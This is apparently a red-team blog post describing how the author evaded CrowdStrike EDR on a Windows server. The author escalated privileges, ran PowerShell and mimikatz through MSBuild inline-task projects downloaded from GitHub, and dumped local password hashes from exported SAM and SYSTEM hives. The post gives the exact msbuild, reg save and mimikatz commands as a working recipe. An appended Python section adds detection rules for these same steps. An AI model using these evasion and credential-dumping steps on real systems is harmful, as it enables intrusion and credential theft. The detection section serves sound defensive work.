How I Bypassed Crowdstrike Restriction
CrowdStrike is a set of advanced EDR (endpoint detection and response) applications and techniques that provide an industry-leading NGAV (next-generation anti-virus) offering, using machine learning to ensure breaches are stopped before they occur. CrowdStrike monitors processes running on the OS by hooking, so if we run any malicious process on a machine it will monitor and log it; all of this happens at the kernel level.
In this post, I am going to explain how I managed to bypass CrowdStrike EDR and dump hashes by executing mimikatz in a CrowdStrike-protected network.
In my recent red teaming assessment, I got a foothold on a web application with limited user access (the IIS user) running on Windows Server 2012 R2, so my first task was to perform privilege escalation and get local admin privileges.
For this, I ran the Juicy Potato exploit (a FUD build by Anurag Srivastava, thanks!) and created a user with admin privileges.
Later, I tried to dump LSASS so I could get other users' hashes using procdump, but CrowdStrike blocked procdump, categorizing it as malicious behavior… hmmm…
I tried all known techniques to dump LSASS but failed. Sigh!
My googling skills came to the rescue as I luckily found some interesting writeups and scripts, but the best and most trusted script I found is by Casey Smith (Twitter: @subTee):
https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj
To run this script, save it in any directory with write permission, execute it and behold the magic:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj
I was able to run PowerShell without restriction, with CrowdStrike sleeping. My next task was to dump hashes and perform post-exploitation.
I knew this technique would work in this scenario, so I downloaded one more script, also written by Casey Smith.
https://raw.githubusercontent.com/3gstudent/msbuild-inline-task/master/executes%20mimikatz.xml
As before, save the script in any writable directory and run the command below.
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe mimiketz.xml
Voila! I got a mimikatz shell :P with CrowdStrike & Symantec still sleeping. Time to dump passwords.
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
I then started to dump hashes but had no luck, as I got an error due to CrowdStrike hooking the LSASS process and not allowing me to dump it, so I started testing another way to dump: dumping offline.
For this, I needed to extract and copy the SYSTEM and SAM registry hives for the local machine.
reg save HKLM\SYSTEM SystemBkup.hiv
reg save HKLM\SAM SamBkup.hiv
mimikatz # privilege::debug
mimikatz # token::whoami
If you're not SYSTEM or using an impersonated SYSTEM token, you'll get an access denied error:
mimikatz # token::elevate
I then ran "log hash.txt" so that the output of the next command goes to a txt file.
mimikatz # log hash.txt
Then I ran "lsadump::sam SystemBkup.hiv SamBkup.hiv" to display the usernames and hashes for all local users.
mimikatz # lsadump::sam SystemBkup.hiv SamBkup.hiv
And see the magic ;) All output is saved in hash.txt.
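As an added example (not part of the original post, and not code from CrowdStrike, mimikatz or the MSBuild scripts linked above), this is the detection logic a blue team could run over process-creation telemetry to catch the two steps described here: MSBuild building an inline-task project from a writable directory, and reg.exe exporting the SAM/SYSTEM hives. The event fields and sample events are constructed and assumed to follow a Sysmon-style process-creation record.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style), not real telemetry.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe",
     "cmdline": "msbuild.exe MSBuildShell.csproj",
     "cwd": r"C:\inetpub\wwwroot\uploads", "parent": r"C:\Windows\System32\inetsrv\w3wp.exe"},
    {"image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe",
     "cmdline": "msbuild.exe mimiketz.xml",
     "cwd": r"C:\Users\Public", "parent": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg save HKLM\SAM SamBkup.hiv",
     "cwd": r"C:\Users\Public", "parent": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe",
     "cmdline": "msbuild.exe MyApp.csproj /t:Build",
     "cwd": r"C:\src\MyApp", "parent": r"C:\Program Files\Microsoft Visual Studio\devenv.exe"},
    {"image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion",
     "cwd": r"C:\Users\alice", "parent": r"C:\Windows\System32\cmd.exe"},
]

# Directories a low-privileged account (such as the IIS worker) can usually write to.
WRITABLE_DIR = re.compile(r"\\(users|inetpub|temp|programdata)\\", re.IGNORECASE)
PROJECT_ARG = re.compile(r"\S+\.(csproj|vbproj|proj|xml)\b", re.IGNORECASE)
HIVE_SAVE = re.compile(r"\b(save|export)\b.*HKLM\\(SAM|SYSTEM|SECURITY)\b", re.IGNORECASE)
LSASS_DUMP = re.compile(r"procdump.*lsass", re.IGNORECASE)

def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()

def classify_event(event):
    """Return the names of the detection rules that match one process-creation event."""
    hits = []
    image, parent = image_name(event["image"]), image_name(event["parent"])
    cmd, cwd = event["cmdline"], event["cwd"] + "\\"
    if image == "msbuild.exe" and PROJECT_ARG.search(cmd):
        # A project built from a writable directory or spawned by a web worker is the
        # MSBuild living-off-the-land pattern; an IDE build from a source tree is not.
        if WRITABLE_DIR.search(cwd) or parent == "w3wp.exe":
            hits.append("msbuild_inline_task_from_writable_dir")
    if image == "reg.exe" and HIVE_SAVE.search(cmd):
        hits.append("sam_system_hive_export")  # preparation for an offline credential dump
    if LSASS_DUMP.search(cmd):
        hits.append("lsass_memory_dump_tool")
    return hits

def scan(events):
    """Map the index of each suspicious event to the rules it matched."""
    return {i: classify_event(e) for i, e in enumerate(events) if classify_event(e)}
```

The hive-export rule also covers HKLM\SECURITY, since the same reg.exe pattern is used for that hive; tune WRITABLE_DIR to the build directories actually used in your environment to keep developer noise down.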
Special mentions: Manish Tanwar, Anurag Srivastava and Casey Smith
Happy Hacking ;)